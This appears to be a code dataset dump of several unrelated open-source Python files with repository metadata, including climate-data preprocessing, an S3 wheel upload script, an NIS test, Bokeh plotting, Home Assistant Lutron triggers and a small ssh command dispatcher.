s_start_time = str(self.start_time)[0:10]
s_stop_time = str(self.stop_time)[0:10]
#1) select timeperiod and generate monthly mean file
if target_grid == 't63grid':
gridtok = 'T63'
else:
gridtok = 'SPECIAL_GRID'
file_monthly = filename1[:-3] + '_' + s_start_time + '_' + s_stop_time + '_' + gridtok + '_monmean.nc' # target filename
file_monthly = get_temporary_directory() + os.path.basename(file_monthly)
sys.stdout.write('\n *** Model file monthly: %s\n' % file_monthly)
if not os.path.exists(filename1):
print 'WARNING: File not existing: ' + filename1
return None
cdo.monmean(options='-f nc', output=file_monthly, input='-' + interpolation + ',' + target_grid + ' -seldate,' + s_start_time + ',' + s_stop_time + ' ' + filename1, force=force_calc)
sys.stdout.write('\n *** Reading model data... \n')
sys.stdout.write(' Interval: ' + interval + '\n')
#2) calculate monthly or seasonal climatology
if interval == 'monthly':
mdata_clim_file = file_monthly[:-3] + '_ymonmean.nc'
mdata_sum_file = file_monthly[:-3] + '_ymonsum.nc'
mdata_N_file = file_monthly[:-3] + '_ymonN.nc'
mdata_clim_std_file = file_monthly[:-3] + '_ymonstd.nc'
cdo.ymonmean(options='-f nc -b 32', output=mdata_clim_file, input=file_monthly, force=force_calc)
cdo.ymonsum(options='-f nc -b 32', output=mdata_sum_file, input=file_monthly, force=force_calc)
cdo.ymonstd(options='-f nc -b 32', output=mdata_clim_std_file, input=file_monthly, force=force_calc)
cdo.div(options='-f nc', output=mdata_N_file, input=mdata_sum_file + ' ' + mdata_clim_file, force=force_calc) # number of samples
elif interval == 'season':
mdata_clim_file = file_monthly[:-3] + '_yseasmean.nc'
mdata_sum_file = file_monthly[:-3] + '_yseassum.nc'
mdata_N_file = file_monthly[:-3] + '_yseasN.nc'
mdata_clim_std_file = file_monthly[:-3] + '_yseasstd.nc'
cdo.yseasmean(options='-f nc -b 32', output=mdata_clim_file, input=file_monthly, force=force_calc)
cdo.yseassum(options='-f nc -b 32', output=mdata_sum_file, input=file_monthly, force=force_calc)
cdo.yseasstd(options='-f nc -b 32', output=mdata_clim_std_file, input=file_monthly, force=force_calc)
cdo.div(options='-f nc -b 32', output=mdata_N_file, input=mdata_sum_file + ' ' + mdata_clim_file, force=force_calc) # number of samples
else:
raise ValueError('Unknown temporal interval. Can not perform preprocessing!')
if not os.path.exists(mdata_clim_file):
return None
#3) read data
if interval == 'monthly':
thetime_cylce = 12
elif interval == 'season':
thetime_cylce = 4
else:
print interval
raise ValueError('Unsupported interval!')
mdata = Data(mdata_clim_file, varname, read=True, label=self._unique_name, unit=units, lat_name=lat_name, lon_name=lon_name, shift_lon=False, scale_factor=scf, level=thelevel, time_cycle=thetime_cylce)
mdata_std = Data(mdata_clim_std_file, varname, read=True, label=self._unique_name + ' std', unit='-', lat_name=l
|
metaml/nupic.core
|
ci/travis/deploy-wheel-to-s3.py
|
Python
|
agpl-3.0
| 1,831
| 0.0071
|
#!/usr/bin/env python
# ----------------------------------------------------------------------
# Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2013-5, Numenta, Inc. Unless you have an agreement
# with Numenta, Inc., for a separate license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Affero Public License for more details.
#
# You should have received a copy of the GNU Affero Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
# ----------------------------------------------------------------------
import os
import sys
import boto
from boto.s3.key import Key
# This script assumes the following environment variables are set for boto:
# - AWS_ACCESS_KEY_ID
# - AWS_SECRET_ACCESS_KEY
REGION = "us-west-2"
BUCKET = "artifacts.numenta.org"
RELEASE_FOLDER = "numenta/nupic.core/releases/nupic.bindings"
|
def upload(artifactsBucket, wheelFileName, wheelPath):
key = Key(artifactsBucket)
key.key = "%s/%s" % (RELEASE_FOLDER, wheelFileName)
print "Uploading %s to %s/%s..." % (wheelFileName, BUCKET, RELEASE_FOLDER)
key.set_contents_from_filename(wheelPath)
def run(wheelPath):
wheelFileName = os.path.basename(wheelPath)
conn = boto.connect_s3()
artifactsBucket = conn.get_bucket(BUCKET)
upload(artifactsBucket, wheelFileName, wheelPath)
if __name__ == "__main__":
wheelPath = sys.argv[1]
|
run(wheelPath)
|
j5shi/Thruster
|
pylibs/test/test_nis.py
|
Python
|
gpl-2.0
| 1,215
| 0.003292
|
from test import test_support
import unittest
nis = test_support.import_module('nis')
class NisTests(unittest.TestCase):
def test_maps(self):
try:
maps = nis.maps()
except nis.error, msg:
# NIS is probably not active, so this test isn't useful
self.skipTest(str(msg))
try:
# On some systems, this map is only accessible to the
# super user
maps.remove("passwd.adjunct.byname")
except ValueError:
pass
done = 0
for nismap in maps:
|
mapping = nis.cat(nismap)
for k, v in mapping.items():
if not k:
continue
if nis.match(k, nismap) != v:
self.fail("NIS match failed for key `%s' in map `%s'" % (k, nismap))
else:
# just test the one key, otherwise this test could take a
# very long time
done = 1
break
if done:
|
break
def test_main():
test_support.run_unittest(NisTests)
if __name__ == '__main__':
test_main()
|
the13fools/Bokeh_Examples
|
glyphs/anscombe.py
|
Python
|
bsd-3-clause
| 3,251
| 0.021839
|
from __future__ import print_function
import numpy as np
import pandas as pd
from bokeh.browserlib import view
from bokeh.document import Document
from bokeh.embed import file_html
from bokeh.glyphs import Circle, Line
from bokeh.objects import (
ColumnDataSource, Glyph, Grid, GridPlot, LinearAxis, Plot, Range1d
)
from bokeh.resources import INLINE
raw_columns=[
[10.0, 8.04, 10.0, 9.14, 10.0, 7.46, 8.0, 6.58],
[8.0, 6.95, 8.0, 8.14, 8.0, 6.77, 8.0, 5.76],
[13.0, 7.58, 13.0, 8.74, 13.0, 12.74, 8.0, 7.71],
[9.0, 8.81, 9.0, 8.77, 9.0, 7.11, 8.0, 8.84],
[11.0, 8.33, 11.0, 9.26, 11.0, 7.81, 8.0, 8.47],
[14.0, 9.96, 14.0, 8.10, 14.0, 8.84, 8.0, 7.04],
[6.0, 7.24, 6.0, 6.13, 6.0, 6.08, 8.0, 5.25],
[4.0, 4.26, 4.0, 3.10, 4.0, 5.39, 19.0, 12.5],
[12.0, 10.84, 12.0, 9.13, 12.0, 8.15, 8.0, 5.56],
[7.0, 4.82, 7.0, 7.26, 7.0, 6.42, 8.0, 7.91],
[5.0, 5.68, 5.0, 4.74, 5.0, 5.73, 8.0, 6.89]]
quartet = pd.DataFrame(data=raw_columns, columns=
['Ix','Iy','IIx','IIy','IIIx','IIIy','IVx','IVy'])
circles_source = ColumnDataSource(
data = dict(
xi = quartet['Ix'],
yi = quartet['Iy'],
xii = quartet['IIx'],
yii = quartet['IIy'],
xiii = quartet['IIIx'],
yiii = quartet['IIIy'],
xiv = quartet['IVx'],
yiv = quartet['IVy'],
)
)
x = np.linspace(-0.5, 20.5, 10)
y = 3 + 0.5 * x
lines_source = ColumnDataSource(data=dict(x=x, y=y))
xdr = Range1d(start=-0.5, end=20.5)
ydr = Range1d(start=-0.5, end=20.5)
def make_plot(title, xname, yname):
plot = Plot(
x_range=xdr, y_range=ydr, data_sources=[lines_source, circles_source],
title=title, plot_width=400, plot_height=400, border_fill='white', background_fill='#e9e0db')
xaxis = LinearAxis(plot=plot, dimension=0, location="bottom", axis_line_color=None)
yaxis = LinearAxis(plot=plot, dimension=1, location="left", axis_line_color=None)
xgrid = Grid(plot=plot, dimension=0, axis=xaxis)
ygrid = Grid(plot=plot, dimension=1, axis=yaxis)
line_renderer = Glyph(
data_source = lines_source,
xdata_range = xdr,
ydata_range = ydr,
glyph = Line(x='x', y='y', line_color="#666699", line_width=2),
)
plot.renderers.append(line_renderer)
circle_renderer = Glyph(
data_source = circles_source,
xdata_range = xdr,
ydata_range = ydr,
glyph = Circle(x=xname, y=yname, size=12, fill_color="#cc6633",
line_color="#cc6633", fill_alpha=0.5),
)
plot.renderers.append(circle_renderer)
return plot
#where will this comment show up
I = make_plot('I', 'xi', 'yi')
II = make_plot('
|
II', 'xii', 'yii')
III = make_plot('III', 'xiii', 'yiii')
IV = make_plot('IV', 'xiv', 'yiv')
grid = GridPlot(children=[[I, II], [III, IV]], plot_width=800)
doc = Document( )
doc.add(grid)
if __name__ == "__main__":
|
filename = "anscombe.html"
with open(filename, "w") as f:
f.write(file_html(doc, INLINE, "Anscombe's Quartet"))
print("Wrote %s" % filename)
view(filename)
|
atodorov/anaconda
|
pyanaconda/modules/payloads/source/source_base_interface.py
|
Python
|
gpl-2.0
| 1,817
| 0.001101
|
#
# Base object of all payload sources.
#
# Copyright (C) 2019 Red Hat, Inc.
#
# This copyrighted material is made available to anyone wishing to use,
# modify, copy, or redistribute it subject to the terms and conditions of
# the GNU General Public License v.2, or (at your option) any later version.
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY expressed or implied, including the implied warranties of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General
# Public License for more details. You should have received a copy of the
# GNU General Public License along with this program; if not, write to the
# Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA. Any Red Hat trademarks that are incorporated in the
# source code or documentation are not subject to the GNU General Public
# License and may only be used or replicated with the express permission of
# Red Hat, I
|
nc.
#
from abc import ABCMeta
from dasbus.server.interface import dbus_interface
from dasbus.typing import * # pylint: disable=wildcard-import
from pyanaconda.modules.common.base.base_template import ModuleInterfaceTemplate
from pyanaconda.modules.common.constants.interfaces import PAYLOAD_SOURCE
@dbus_interface(PAYLOAD_SOURCE.interface_name)
class PayloadSourceBaseInterface(ModuleInterfaceTemplate, metaclass=AB
|
CMeta):
"""Base class for all the payload source module interfaces.
This object contains API shared by all the sources. Everything in this object has
to be implemented by a source to be used.
"""
@property
def Type(self) -> Str:
"""Get the type of this source.
Possible values are:
- LIVE_OS_IMAGE
"""
return self.implementation.type.value
|
falkTX/Cadence
|
src/shared_settings.py
|
Python
|
gpl-2.0
| 12,056
| 0.004728
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Common/Shared code related to the Settings dialog
# Copyright (C) 2010-2018 Filipe Coelho <falktx@falktx.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, o
|
r
# any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICUL
|
AR PURPOSE. See the
# GNU General Public License for more details.
#
# For a full copy of the GNU General Public License see the COPYING file
# ------------------------------------------------------------------------------------------------------------
# Imports (Global)
if True:
from PyQt5.QtCore import pyqtSlot, QSettings
from PyQt5.QtWidgets import QDialog, QDialogButtonBox
else:
from PyQt4.QtCore import pyqtSlot, QSettings
from PyQt4.QtGui import QDialog, QDialogButtonBox
# ------------------------------------------------------------------------------------------------------------
# Imports (Custom Stuff)
import ui_settings_app
from shared import *
from patchcanvas_theme import *
# ------------------------------------------------------------------------------------------------------------
# Global variables
# Tab indexes
TAB_INDEX_MAIN = 0
TAB_INDEX_CANVAS = 1
TAB_INDEX_LADISH = 2
TAB_INDEX_NONE = 3
# PatchCanvas defines
CANVAS_ANTIALIASING_SMALL = 1
CANVAS_EYECANDY_SMALL = 1
# LADISH defines
LADISH_CONF_KEY_DAEMON_NOTIFY = "/org/ladish/daemon/notify"
LADISH_CONF_KEY_DAEMON_SHELL = "/org/ladish/daemon/shell"
LADISH_CONF_KEY_DAEMON_TERMINAL = "/org/ladish/daemon/terminal"
LADISH_CONF_KEY_DAEMON_STUDIO_AUTOSTART = "/org/ladish/daemon/studio_autostart"
LADISH_CONF_KEY_DAEMON_JS_SAVE_DELAY = "/org/ladish/daemon/js_save_delay"
# LADISH defaults
LADISH_CONF_KEY_DAEMON_NOTIFY_DEFAULT = True
LADISH_CONF_KEY_DAEMON_SHELL_DEFAULT = "sh"
LADISH_CONF_KEY_DAEMON_TERMINAL_DEFAULT = "x-terminal-emulator"
LADISH_CONF_KEY_DAEMON_STUDIO_AUTOSTART_DEFAULT = True
LADISH_CONF_KEY_DAEMON_JS_SAVE_DELAY_DEFAULT = 0
# Internal defaults
global SETTINGS_DEFAULT_PROJECT_FOLDER
SETTINGS_DEFAULT_PROJECT_FOLDER = HOME
# ------------------------------------------------------------------------------------------------------------
# Change internal defaults
def setDefaultProjectFolder(folder):
global SETTINGS_DEFAULT_PROJECT_FOLDER
SETTINGS_DEFAULT_PROJECT_FOLDER = folder
# ------------------------------------------------------------------------------------------------------------
# Settings Dialog
class SettingsW(QDialog):
def __init__(self, parent, appName, hasOpenGL=False):
QDialog.__init__(self, parent)
self.ui = ui_settings_app.Ui_SettingsW()
self.ui.setupUi(self)
# -------------------------------------------------------------
# Set default settings
self.fRefreshInterval = 120
self.fAutoHideGroups = True
self.fUseSystemTray = True
self.fCloseToTray = False
# -------------------------------------------------------------
# Set app-specific settings
if appName == "catarina":
self.fAutoHideGroups = False
self.ui.lw_page.hideRow(TAB_INDEX_MAIN)
self.ui.lw_page.hideRow(TAB_INDEX_LADISH)
self.ui.lw_page.setCurrentCell(TAB_INDEX_CANVAS, 0)
elif appName == "catia":
self.fUseSystemTray = False
self.ui.group_main_paths.setEnabled(False)
self.ui.group_main_paths.setVisible(False)
self.ui.group_tray.setEnabled(False)
self.ui.group_tray.setVisible(False)
self.ui.lw_page.hideRow(TAB_INDEX_LADISH)
self.ui.lw_page.setCurrentCell(TAB_INDEX_MAIN, 0)
elif appName == "claudia":
self.ui.cb_jack_port_alias.setEnabled(False)
self.ui.cb_jack_port_alias.setVisible(False)
self.ui.label_jack_port_alias.setEnabled(False)
self.ui.label_jack_port_alias.setVisible(False)
self.ui.lw_page.setCurrentCell(TAB_INDEX_MAIN, 0)
else:
self.ui.lw_page.hideRow(TAB_INDEX_MAIN)
self.ui.lw_page.hideRow(TAB_INDEX_CANVAS)
self.ui.lw_page.hideRow(TAB_INDEX_LADISH)
self.ui.stackedWidget.setCurrentIndex(TAB_INDEX_NONE)
return
# -------------------------------------------------------------
# Load settings
self.loadSettings()
# -------------------------------------------------------------
# Set-up GUI
if not hasOpenGL:
self.ui.cb_canvas_use_opengl.setChecked(False)
self.ui.cb_canvas_use_opengl.setEnabled(False)
self.ui.lw_page.item(0, 0).setIcon(getIcon(appName, 48))
self.ui.label_icon_main.setPixmap(getIcon(appName, 48).pixmap(48, 48))
# -------------------------------------------------------------
# Set-up connections
self.accepted.connect(self.slot_saveSettings)
self.ui.buttonBox.button(QDialogButtonBox.Reset).clicked.connect(self.slot_resetSettings)
self.ui.b_main_def_folder_open.clicked.connect(self.slot_getAndSetProjectPath)
def loadSettings(self):
settings = QSettings()
if not self.ui.lw_page.isRowHidden(TAB_INDEX_MAIN):
self.ui.le_main_def_folder.setText(settings.value("Main/DefaultProjectFolder", SETTINGS_DEFAULT_PROJECT_FOLDER, type=str))
self.ui.cb_tray_enable.setChecked(settings.value("Main/UseSystemTray", self.fUseSystemTray, type=bool))
self.ui.cb_tray_close_to.setChecked(settings.value("Main/CloseToTray", self.fCloseToTray, type=bool))
self.ui.sb_gui_refresh.setValue(settings.value("Main/RefreshInterval", self.fRefreshInterval, type=int))
self.ui.cb_jack_port_alias.setCurrentIndex(settings.value("Main/JackPortAlias", 2, type=int))
# ---------------------------------------
if not self.ui.lw_page.isRowHidden(TAB_INDEX_CANVAS):
self.ui.cb_canvas_hide_groups.setChecked(settings.value("Canvas/AutoHideGroups", self.fAutoHideGroups, type=bool))
self.ui.cb_canvas_bezier_lines.setChecked(settings.value("Canvas/UseBezierLines", True, type=bool))
self.ui.cb_canvas_eyecandy.setCheckState(settings.value("Canvas/EyeCandy", CANVAS_EYECANDY_SMALL, type=int))
self.ui.cb_canvas_use_opengl.setChecked(settings.value("Canvas/UseOpenGL", False, type=bool))
self.ui.cb_canvas_render_aa.setCheckState(settings.value("Canvas/Antialiasing", CANVAS_ANTIALIASING_SMALL, type=int))
self.ui.cb_canvas_render_hq_aa.setChecked(settings.value("Canvas/HighQualityAntialiasing", False, type=bool))
themeName = settings.value("Canvas/Theme", getDefaultThemeName(), type=str)
for i in range(Theme.THEME_MAX):
thisThemeName = getThemeName(i)
self.ui.cb_canvas_theme.addItem(thisThemeName)
if thisThemeName == themeName:
self.ui.cb_canvas_theme.setCurrentIndex(i)
# ---------------------------------------
if not self.ui.lw_page.isRowHidden(TAB_INDEX_LADISH):
self.ui.cb_ladish_notify.setChecked(settings.value(LADISH_CONF_KEY_DAEMON_NOTIFY, LADISH_CONF_KEY_DAEMON_NOTIFY_DEFAULT, type=bool))
self.ui.le_ladish_shell.setText(settings.value(LADISH_CONF_KEY_DAEMON_SHELL, LADISH_CONF_KEY_DAEMON_SHELL_DEFAULT, type=str))
self.ui.le_ladish_terminal.setText(settings.value(LADISH_CONF_KEY_DAEMON_TERMINAL, LADISH_CONF_KEY_DAEMON_TERMINAL_DEFAULT, type=str))
self.ui.cb_ladish_studio_autostart.setChecked(settings.value(LADISH_CONF_KEY_DAEMON_STUDIO_AUTOSTART, LADISH_CONF_KEY_DAEMON_STUDIO_AUTOSTART_DEFAULT, type=bool))
self.ui.sb_ladish_jsdelay.setValue(settings.value(LADISH_CONF_KEY_DAEMON_JS_SAVE_DELAY, LADISH_CONF_KEY_DAEMON_JS_S
|
lluxury/P_U_S_A
|
8_OS_Soup/code/dispatch1.py
|
Python
|
mit
| 297
| 0.016835
|
#!/usr/bin/env python
import subprocess
"""
A ssh based command dispatch system
"""
machines = ["10.0.1.40",
"10.0.1.50",
"10.0.1.51",
"10.0.1.60",
"10.0.1.80"]
cmd = "python /src/fing
|
erprint.py"
for machine in machines:
subprocess.call("ssh root@%s %s" % (machine, cmd), shell=True)
| |
vslavik/poedit
|
scripts/extract-fileviewer-mappings.py
|
Python
|
mit
| 3,349
| 0.008361
|
#!/usr/bin/env python3
# Update plural forms expressions from the data collected by Unicode Consortium
# (see http://www.unicode.org/cldr/charts/supplemental/language_plural_rules.html),
# but from a JSON version by Transifex folks
import os.path
import sys
import urllib.request
import re
import gettext
import json
import subprocess
from tempfile import TemporaryDirectory
import xml.etree.ElementTree as ET
PRISM_COMPONENTS_URL = 'https://github.com/PrismJS/prism/raw/master/components.json'
LANGUAGE_MAP_URL = 'https://github.com/blakeembrey/language-map/raw/master/languages.json'
# resolve ambiguities:
OVERRIDES = {
'h' : 'cpp',
'inc' : 'php',
'cake' : 'coffeescript',
'es' : 'javascript',
'fcgi' : 'lua',
'cgi' : 'perl',
'pl' : 'perl',
'pro' : 'perl',
'ts' : 'typescript',
'tsx' : 'typescript',
'sch' : 'scheme',
'cs' : 'csharp',
'st' : 'smalltalk',
}
# known irrelevant languages
|
:
BLACKLIST = set([
'glsl', 'nginx', 'apacheconf', 'matlab', 'opencl', 'puppet', 'reason', 'renpy',
'plsql', 'sql', 'tex',
])
# ...and extensions:
BLACKLIST_EXT =
|
set([
'spec', 'pluginspec', 'ml',
])
MARKER_BEGIN = "// Code generated with scripts/extract-fileviewer-mappings.py begins here"
MARKER_END = "// Code generated with scripts/extract-fileviewer-mappings.py ends here"
prism_langs = json.loads(urllib.request.urlopen(PRISM_COMPONENTS_URL).read().decode('utf-8'))['languages']
del prism_langs['meta']
language_map = json.loads(urllib.request.urlopen(LANGUAGE_MAP_URL).read().decode('utf-8'))
prism_known = {}
for lang, data in prism_langs.items():
prism_known[lang] = lang
for a in data.get('alias', []):
prism_known[a] = lang
ext_to_lang = {}
for lang, data in language_map.items():
lang = lang.lower()
lango = lang
if not lang in prism_known:
for a in data.get('aliases', []):
if a in prism_known:
lang = a
break
if lang not in prism_known:
continue
if lang in BLACKLIST:
continue
for ext in data.get('extensions', []):
assert ext[0] == '.'
ext = ext[1:].lower()
if ext in BLACKLIST_EXT:
continue
if ext != lang:
if ext in ext_to_lang:
if ext in OVERRIDES:
ext_to_lang[ext] = OVERRIDES[ext]
else:
sys.stderr.write(f'SKIPPING due to extension conflict: {ext} both {lang} and {ext_to_lang[ext]}\n')
ext_to_lang[ext] = lang
else:
ext_to_lang[ext] = lang
output = f'{MARKER_BEGIN}\n\n'
for ext in sorted(ext_to_lang.keys()):
lang = ext_to_lang[ext]
output += f'{{ "{ext}", "{lang}" }},\n'
output += f'\n{MARKER_END}\n'
if os.path.isfile("src/fileviewer.extensions.h"):
outfname = "src/fileviewer.extensions.h"
else:
raise RuntimeError("run this script from project root directory")
with open(outfname, "rt") as f:
orig_content = f.read()
content = re.sub('%s(.*?)%s' % (MARKER_BEGIN, MARKER_END),
output,
orig_content,
0,
re.DOTALL)
with open(outfname, "wt") as f:
f.write(content)
print(output)
sys.stderr.write(f'Generated code written to {outfname}\n')
|
Danielhiversen/home-assistant
|
homeassistant/components/lutron_caseta/device_trigger.py
|
Python
|
apache-2.0
| 8,121
| 0.000739
|
"""Provides device triggers for lutron caseta."""
from __future__ import annotations
from typing import Any
import voluptuous as vol
from homeassistant.components.automation import (
AutomationActionType,
AutomationTriggerInfo,
)
from homeassistant.components.device_automation import DEVICE_TRIGGER_BASE_SCHEMA
from homeassistant.components.device_automation.exceptions import (
InvalidDeviceAutomationConfig,
)
from homeassistant.components.homeassistant.triggers import event as event_trigger
from homeassistant.const import (
CONF_DEVICE_ID,
CONF_DOMAIN,
CONF_EVENT,
CONF_PLATFORM,
CONF_TYPE,
)
from homeassistant.core import CALLBACK_TYPE, HomeAssistant
from homeassistant.helpers.typing import ConfigType
from .const import (
ACTION_PRESS,
ACTION_RELEASE,
ATTR_ACTION,
ATTR_BUTTON_NUMBER,
ATTR_SERIAL,
BUTTON_DEVICES,
CONF_SUBTYPE,
DOMAIN,
LUTRON_CASETA_BUTTON_EVENT,
)
SUPPORTED_INPUTS_EVENTS_TYPES = [ACTION_PRESS, ACTION_RELEASE]
LUTRON_BUTTON_TRIGGER_SCHEMA = DEVICE_TRIGGER_BASE_SCHEMA.extend(
{
vol.Required(CONF_TYPE): vol.In(SUPPORTED_INPUTS_EVENTS_TYPES),
}
)
PICO_2_BUTTON_BUTTON_TYPES = {
"on": 2,
"off": 4,
}
PICO_2_BUTTON_TRIGGER_SCHEMA = LUTRON_BUTTON_TRIGGER_SCHEMA.extend(
{
vol.Required(CONF_SUBTYPE): vol.In(PICO_2_BUTTON_BUTTON_TYPES),
}
)
PICO_2_BUTTON_RAISE_LOWER_BUTTON_TYPES = {
"on": 2,
"off": 4,
"raise": 5,
"lower": 6,
}
PICO_2_BUTTON_RAISE_LOWER_TRIGGER_SCHEMA = LUTRON_BUTTON_TRIGGER_SCHEMA.extend(
{
vol.Required(CONF_SUBTYPE): vol.In(PICO_2_BUTTON_RAISE_LOWER_BUTTON_TYPES),
}
)
PICO_3_BUTTON_BUTTON_TYPES = {
"on": 2,
"stop": 3,
"off": 4,
}
PICO_3_BUTTON_TRIGGER_SCHEMA = LUTRON_BUTTON_TRIGGER_SCHEMA.extend(
{
vol.Required(CONF_SUBTYPE): vol.In(PICO_3_BUTTON_BUTTON_TYPES),
}
)
PICO_3_BUTTON_RAISE_LOWER_BUTTON_TYPES = {
"on": 2,
"stop": 3,
"off": 4,
"raise": 5,
"lower": 6,
}
PICO_3_BUTTON_RAISE_LOWER_TRIGGER_SCHEMA = LUTRON_BUTTON_TRIGGER_SCHEMA.extend(
{
vol.Required(CONF_SUBTYPE): vol.In(PICO_3_BUTTON_RAISE_LOWER_BUTTON_TYPES),
}
)
PICO_4_BUTTON_BUTTON_TYPES = {
"button_1": 8,
"button_2": 9,
"button_3": 10,
"button_4": 11,
}
PICO_4_BUTTON_TRIGGER_SCHEMA = LUTRON_BUTTON_TRIGGER_SCHEMA.extend(
{
vol.Required(CONF_SUBTYPE): vol.In(PICO_4_BUTTON_BUTTON_TYPES),
}
)
PICO_4_BUTTON_ZONE_BUTTON_TYPES = {
"on": 8,
"raise": 9,
"lower": 10,
"off": 11,
}
PICO_4_BUTTON_ZONE_TRIGGER_SCHEMA = LUTRON_BUTTON_TRIGGER_SCHEMA.extend(
{
vol.Required(CONF_SUBTYPE): vol.In(PICO_4_BUTTON_ZONE_BUTTON_TYPES),
}
)
PICO_4_BUTTON_SCENE_BUTTON_TYPES = {
"button_1": 8,
"button_2": 9,
"button_3": 10,
"off": 11,
}
PICO_4_BUTTON_SCENE_TRIGGER_SCHEMA = LUTRON_BUTTON_TRIGGER_SCHEMA.extend(
{
vol.Required(CONF_SUBTYPE): vol.In(PICO_4_BUTTON_SCENE_BUTTON_TYPES),
}
)
PICO_4_BUTTON_2_GROUP_BUTTON_TYPES = {
"group_1_button_1": 8,
"group_1_button_2": 9,
"group_2_button_1": 10,
"group_2_button_2": 11,
}
PICO_4_BUTTON_2_GROUP_TRIGGER_SCHEMA = LUTRON_BUTTON_TRIGGER_SCHEMA.extend(
{
vol.Required(CONF_SUBTYPE): vol.In(PICO_4_BUTTON_2_GROUP_BUTTON_TYPES),
}
)
FOUR_GROUP_REMOTE_BUTTON_TYPES = {
"open_all": 2,
"stop_all": 3,
"close_all": 4,
"raise_all": 5,
"lower_all": 6,
"open_1": 10,
"stop_1": 11,
"close_1": 12,
"raise_1": 13,
"lower_1": 14,
"open_2": 18,
"stop_2": 19,
"close_2": 20,
"raise_2": 21,
"lower_2": 22,
"open_3": 26,
"stop_3": 27,
"close_3": 28,
"raise_3": 29,
"lower_3": 30,
"open_4": 34,
"stop_4": 35,
"close_4": 36,
"raise_4": 37,
"lower_4": 38,
}
FOUR_GROUP_REMOTE_TRIGGER_SCHEMA = LUTRON_BUTTON_TRIGGER_SCHEMA.extend(
{
vol.Required(CONF_SUBTYPE): vol.In(FOUR_GROUP_REMOTE_BUTTON_TYPES),
}
)
DEVICE_TYPE_SCHEMA_MAP = {
"Pico2Button": PICO_2_BUTTON_TRIGGER_SCHEMA,
"Pico2ButtonRaiseLower": PICO_2_BUTTON_RAISE_LOWER_TRIGGER_SCHEMA,
"Pico3Button": PICO_3_BUTTON_TRIGGER_SCHEMA,
"Pico3ButtonRaiseLower": PICO_3_BUTTON_RAISE_LOWER_TRIGGER_SCHEMA,
"Pico4Button": PICO_4_BUTTON_TRIGGER_SCHEMA,
"Pico4ButtonScene": PICO_4_BUTTON_SCENE_TRIGGER_SCHEMA,
"Pico4ButtonZone": PICO_4_BUTTON_ZONE_TRIGGER_SCHEMA,
"Pico4Button2Group": PICO_4_BUTTON_2_GROUP_TRIGGER_SCHEMA,
"FourGroupRemote": FOUR_GROUP_REMOTE_TRIGGER_SCHEMA,
}
DEVICE_TYPE_SUBTYPE_MAP = {
"Pico2Button": PICO_2_BUTTON_BUTTON_TYPES,
"Pico2ButtonRaiseLower": PICO_2_BUTTON_RAISE_LOWER_BUTTON_TYPES,
"Pico3Button": PICO_3_BUTTON_BUTTON_TYPES,
"Pico3ButtonRaiseLower": PICO_3_BUTTON_RAISE_LOWER_BUTTON_TYPES,
"Pico4Button": PICO_4_BUTTON_BUTTON_TYPES,
"Pico4ButtonScene": PICO_4_BUTTON_SCENE_BUTTON_TYPES,
"Pico4ButtonZone": PICO_4_BUTTON_ZONE_BUTTON_TYPES,
"Pico4Button2Group": PICO_4_BUTTON_2_GROUP_BUTTON_TYPES,
"FourGroupRemote": FOUR_GROUP_REMOTE_BUTTON_TYPES,
}
TRIGGER_SCHEMA = vol.Any(
PICO_2_BUTTON_TRIGGER_SCHEMA,
PICO_3_BUTTON_RAISE_LOWER_TRIGGER_SCHEMA,
PICO_4_BUTTON_TRIGGER_SCHEMA,
PICO_4_BUTTON_SCENE_TRIGGER_SCHEMA,
PICO_4_BUTTON_ZONE_TRIGGER_SCHEMA,
PICO_4_BUTTON_2_GROUP_TRIGGER_SCHEMA,
FOUR_GROUP_REMOTE_TRIGGER_SCHEMA,
)
async def async_validate_trigger_config(hass: HomeAssistant, config: ConfigType):
"""Validate config."""
# if device is available verify parameters against device capabilities
device = get_button_device_by_dr_id(hass, config[CONF_DEVICE_ID])
if not device:
return config
schema = DEVICE_TYPE_SCHEMA_MAP.get(device["type"])
if not schema:
raise InvalidDeviceAutomationConfig(
f"Device type {device['type']} not supported: {config[CONF_DEVICE_ID]}"
)
return schema(config)
async def async_get_triggers(
hass: HomeAssistant, device_id: str
) -> list[dict[str, Any]]:
"""List device triggers for lutron caseta devices."""
triggers = []
device = get_button_device_by_dr_id(hass, device_id)
if not device:
raise InvalidDeviceAutomationConfig(f"Device not found: {device_id}")
valid_buttons = DEVICE_TYPE_SUBTYPE_MAP.get(device["type"], [])
for trigger in SUPPORTED_INPUTS_EVENTS_TYPES:
for subtype in valid_buttons:
triggers.append(
{
CONF_PLATFORM: "device",
CONF_DEVICE_ID: device_id,
CONF_DOMAIN: DOMAIN,
CONF_TYPE: trigger,
CONF_SUBTYPE: subtype,
}
)
return triggers
async def async_attach_trigger(
hass: HomeAssistant,
config: ConfigType,
action: AutomationActionType,
automation_info: Aut
|
omationTriggerInfo,
) -> CALLBACK_TYPE:
"""Attach a trigger."""
device = get_button_device_by_dr_id(hass, config[CONF_DEVICE_ID])
schema = DEVICE_TYPE_SCHEMA_MAP.get(device["type"])
valid_buttons = DEVICE_TYPE_SUBTYPE_MAP.get(device["type"])
config = schema(c
|
onfig)
event_config = {
event_trigger.CONF_PLATFORM: CONF_EVENT,
event_trigger.CONF_EVENT_TYPE: LUTRON_CASETA_BUTTON_EVENT,
event_trigger.CONF_EVENT_DATA: {
ATTR_SERIAL: device["serial"],
ATTR_BUTTON_NUMBER: valid_buttons[config[CONF_SUBTYPE]],
ATTR_ACTION: config[CONF_TYPE],
},
}
event_config = event_trigger.TRIGGER_SCHEMA(event_config)
return await event_trigger.async_attach_trigger(
